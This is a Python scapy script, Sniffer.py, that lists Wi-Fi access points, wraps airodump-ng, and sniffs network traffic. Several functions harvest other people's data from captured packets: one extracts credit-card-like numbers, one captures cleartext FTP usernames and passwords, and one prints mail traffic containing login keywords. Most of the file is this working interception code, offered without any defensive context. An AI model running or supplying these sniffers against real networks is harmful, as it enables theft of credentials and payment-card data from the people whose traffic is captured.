Sniffer.py
from scapy.all import *
import AirDumpParser
# ANSI escape sequences used to colour console output.
W = '\033[0m'   # white (normal) - resets the colour
R = '\033[31m'  # red
G = '\033[32m'  # green
O = '\033[33m'  # orange
B = '\033[34m'  # blue
P = '\033[35m'  # purple
C = '\033[36m'  # cyan
T = '\033[93m'  # tan

# Pre-built line prefixes: "[*] ", "[-] " and "[+] " with a coloured symbol.
ast = '[%s*%s] ' % (B, W)
# NOTE(review): this name shadows the builtin min() for the whole module; it is
# kept as-is because other code may refer to it.
min = '[%s-%s] ' % (R, W)
plu = '[%s+%s] ' % (G, W)

# MAC addresses of access points that ssidSniffer has already reported.
ap_list = []
def ssidSniffer(pkt):
    """Report each access point the first time one of its beacon frames is seen.

    Only 802.11 frames with type 0 / subtype 8 (management / beacon) are
    considered.  The transmitter address (addr2) is remembered in the
    module-level ap_list so every access point is printed once.
    """
    if not pkt.haslayer(Dot11):
        return
    is_beacon = pkt.type == 0 and pkt.subtype == 8
    if not is_beacon:
        return
    bssid = pkt.addr2
    if bssid in ap_list:
        return  # already reported
    ap_list.append(bssid)
    # pkt.info is printed as the SSID; presumably it comes from the beacon's
    # first information element - confirm against the capture setup.
    print("AP MAC: %s with SSID: %s " % (bssid, pkt.info))
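def Airdump(interface, filename):
    """Run airodump-ng on *interface* and parse the newest CSV it wrote.

    airodump-ng runs until it exits or the operator presses Ctrl-C.  The most
    recently modified file whose name contains the *filename* prefix is then
    passed to AirDumpParser.csvParser.

    Args:
        interface: name of the wireless interface handed to airodump-ng.
        filename: output prefix handed to airodump-ng via -w.

    Returns:
        True.  NOTE(review): the page lost its indentation, so the trailing
        return is assumed to sit at function level - confirm.

    Raises:
        subprocess.CalledProcessError: airodump-ng could not be started or
            exited with a non-zero status.
    """
    import os  # function-scope import: not guaranteed to be in scope at file level

    # Pass an argument list and no shell: interface and filename used to be
    # concatenated into a shell string, so shell metacharacters in either
    # value were executed and a name containing a space broke the command.
    argv = ['airodump-ng', '-w', filename, '--output-format', 'csv', interface]
    try:
        subprocess.check_output(argv)
    except KeyboardInterrupt:
        print(B+'[INFO]'+W+' Stop Dumping')
    except OSError as err:
        # A missing binary used to surface as the shell's exit status 127;
        # keep raising the same exception type for existing callers.
        raise subprocess.CalledProcessError(127, argv, str(err))

    # Replaces "ls -t | grep <filename> | head -n 1": newest non-hidden entry
    # whose name contains the prefix.  The prefix is compared as plain text,
    # not as a grep pattern, and a directory part in *filename* is honoured.
    directory = os.path.dirname(filename)
    prefix = os.path.basename(filename)
    candidates = [
        os.path.join(directory, name)
        for name in os.listdir(directory or '.')
        if prefix in name and not name.startswith('.')
    ]
    if not candidates:
        # Previously an empty name was handed to the parser in this case.
        print(R+'[INFO]'+W+' No results file found for: '+filename)
        return True
    file_result = max(candidates, key=os.path.getmtime)

    print(B+'[INFO]'+W+' Analyzing results file: '+file_result)
    time.sleep(1)  # take time before re-open output file
    try:
        AirDumpParser.csvParser(file_result)
    except KeyboardInterrupt:
        print(R+'[INFO]'+W+' Exiting to main menu')
    return True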
def sendibleDataSniff(pkt):
    """Print the first card-number-like digit run of each brand found in a packet.

    The raw payload is rendered with pkt.sprintf('%Raw.load%') and searched
    with three patterns (American Express, MasterCard, Visa).

    The patterns test prefix and length only: there is no Luhn check and no
    boundary anchoring, so any long digit run can match and false positives
    are expected.  Matches are printed in full, so the console output must be
    handled as cardholder data.
    """
    payload = pkt.sprintf('%Raw.load%')
    # (message prefix, pattern) pairs, checked and reported in this order.
    card_checks = (
        (' Found American Express Card: ', '3[47][0-9]{13}'),
        (' Found MasterCard Card: ', '5[1-5][0-9]{14}'),
        (' Found Visa Card: ', '4[0-9]{12}(?:[0-9]{3})?'),
    )
    for label, pattern in card_checks:
        hits = re.findall(pattern, payload)
        if hits:
            # Only the first match per brand is reported.
            print(G+'[INFO]'+W+label + hits[0])
def ftpSniff(pkt):
    """Print the FTP USER or PASS argument carried in a packet's raw payload.

    FTP sends both commands in cleartext, so whatever this prints is a live
    credential and the output should be handled accordingly.

    The destination address is read first; this assumes the caller only
    passes packets that carry an IP layer.
    """
    server = pkt.getlayer(IP).dst
    payload = pkt.sprintf('%Raw.load%')
    user_match = re.search('(?i)USER (.*)', payload)
    pass_match = re.search('(?i)PASS (.*)', payload)
    if user_match:
        print(G+'[INFO]'+W+' Detected FTP Login to ' + str(server))
        print(G+'[INFO]'+W+' User account: ' + str(user_match.group(1)))
    elif pass_match:
        # Reached only when the payload has no USER command.
        print(G+'[INFO]'+W+' Password: ' + str(pass_match.group(1)))
def mailSniff(pkt):
    """Print the server address and TCP payload when the payload mentions a login.

    A payload is reported when its text contains 'user' or 'pass' in any
    letter case.  This is a plain substring test, so unrelated traffic that
    happens to contain either word is reported too.  The payload is printed
    unredacted.
    """
    segment = pkt[TCP].payload
    # Skip packets without a data payload.
    if not segment:
        return
    lowered = str(segment).lower()
    if any(keyword in lowered for keyword in ('user', 'pass')):
        print(G+'[INFO]'+W+' Server: %s' % pkt[IP].dst)
        print(G+'[INFO]'+W+' Mail: %s' % pkt[TCP].payload)